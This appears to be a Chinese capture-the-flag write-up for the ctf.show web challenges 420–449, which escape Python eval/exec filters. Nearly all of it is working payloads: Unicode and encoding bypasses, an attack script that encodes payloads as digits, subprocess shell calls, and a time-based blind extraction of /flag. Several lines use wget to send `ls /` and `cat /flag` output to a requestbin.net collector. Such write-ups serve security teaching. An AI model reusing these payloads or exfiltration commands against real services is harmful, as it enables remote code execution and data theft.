>
>
【WEB入门】420-449
hdxw
web420
ls ..
nl ../*web421
ls
nl f*web422
ls
nl *web423-web433
?code=__imp%EF%BD%8Frt__(%27o%27%27s%27).p%EF%BD%8Fpen(%27cat /flag%27).re%EF%BD%81d()from flask import Flask
from flask import request
import re
app = Flask(__name__)
@app.route('/')
def app_index():
code = request.args.get('code')
if code:
reg = re.compile(r'os|open|system|read|eval|builtins')
if reg.search(code)==None:
return eval(code)
return 'where is flag?<!-- /?code -->'
if __name__=="__main__":
app.run(host='0.0.0.0',port=80)web434-web439
没有curl
?code=exec(request.args[%27c%27])&c=print(__import__(%27os%27).popen(%27wget+http%3a%2f%2frequestbin.net%2fr%2f4f26lr0j?a=`ls%20/|base64`%27).read())
?code=exec(request.args[%27c%27])&c=print(__import__(%27os%27).popen(%27wget+http%3a%2f%2frequestbin.net%2fr%2f4f26lr0j?a=`cat%20/flag|base64`%27).read())web440-web441
过滤了引号
?code=exec(request.args[chr(99)])&c=print(__import__(%27os%27).popen(%27wget+http%3a%2f%2frequestbin.net%2fr%2f4f26lr0j?a=`cat%20/flag|base64`%27).read())web442
过滤了数字
?code=exec(request.args[str(None)])&None=print(__import__(%27os%27).popen(%27wget+http%3a%2f%2frequestbin.net%2fr%2f4f26lr0j?a=`cat%20/flag|base64`%27).read())web443
开始上脚本
import base64,requests
value_table = [
"len(str(None))","(4//4)","(4-4//4-4//4)","(4-4//4)","4","(4*4//(4-4//4))",
"((4-4//4-4//4)*(4-4//4))","(4*4-4-4-4//4)","(4*4-4-4)","((4-4//4)*(4-4//4))","((4-4//4-4//4)*(4*4//(4-4//4)))"
][::-1]
playload="""eval(request.args['a'])"""
hexvalue = base64.b16encode(playload.encode()).decode().lower()
print(hexvalue)
tovalue = str(int(hexvalue,16))
print(tovalue)
if (len(tovalue)+9)%10 == 0:
value_str = "pow(s10,s%s*s10)"%(len(tovalue)//10)
else:
value_str = "pow(s10,s%s*s10-s%s)" % ((len(tovalue) // 10)+1,10 - ((len(tovalue) + 9) % 10)-1)
# print(value_str)
tovalue = tovalue[::-1]
i=0
while len(tovalue) > 0:
c = tovalue[0]
if c!="9":
if i==0:
cstr = "-s%s"%(9-int(c))
elif i <= 10:
cstr = "-s%s*pow(s10,s%s)" % (9 - int(c), i)
elif i%10 == 0:
cstr = "-s%s*pow(s10,s%s*s10)" % (9-int(c), i // 10)
else:
cstr = "-s%s*pow(s10,s%s*s10-s%s)" % (9-int(c), (i // 10) + 1, 10 - (i % 10))
value_str += cstr
i += 1
tovalue = tovalue[1:]
value_str += "-s1"
for i in range(len(value_table)):
value_str = value_str.replace("s"+str(len(value_table)-i-1), value_table[i])
print(eval(value_str))
value_str = ("exec(bytes.fromhex(hex("+value_str+")[4-4//4-4//4:]).decode())").replace("4","len(str(None))")
# print(eval(value_str))
# print(value_str)
c="print(__import__('os').popen('wget http://requestbin.net/r/4f26lr0j?a=`cat /flag|base64`').read())"
print(requests.post("http://368118f3-e935-42ad-b151-46e5b7000f89.chall.ctf.show/?a="+c,data={
"code": value_str
}).text)web444
过滤了len,改用-~sum([])
web445
del os.system
del os.popen
c="print(__import__('subprocess').call(['wget http://requestbin.net/r/4f26lr0j?a=`cat /flag|base64`'],shell=True))"参考:https://www.cnblogs.com/rangger/p/9801588.html
web446
del imp.reload不印象,web445脚本继续杀
web447-web449
import subprocess
del subprocess.Popen
del subprocess.call
del subprocess.run
del subprocess.getstatusoutput
del subprocess.getoutput
del subprocess.check_call
del subprocess.check_output
import timeit
del timeit.timeit好家伙
代码同上446,命令执行改为时间盲注
print(__import__('time').sleep(2) if open('/flag').read()[%s]=='%s' else 1)免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论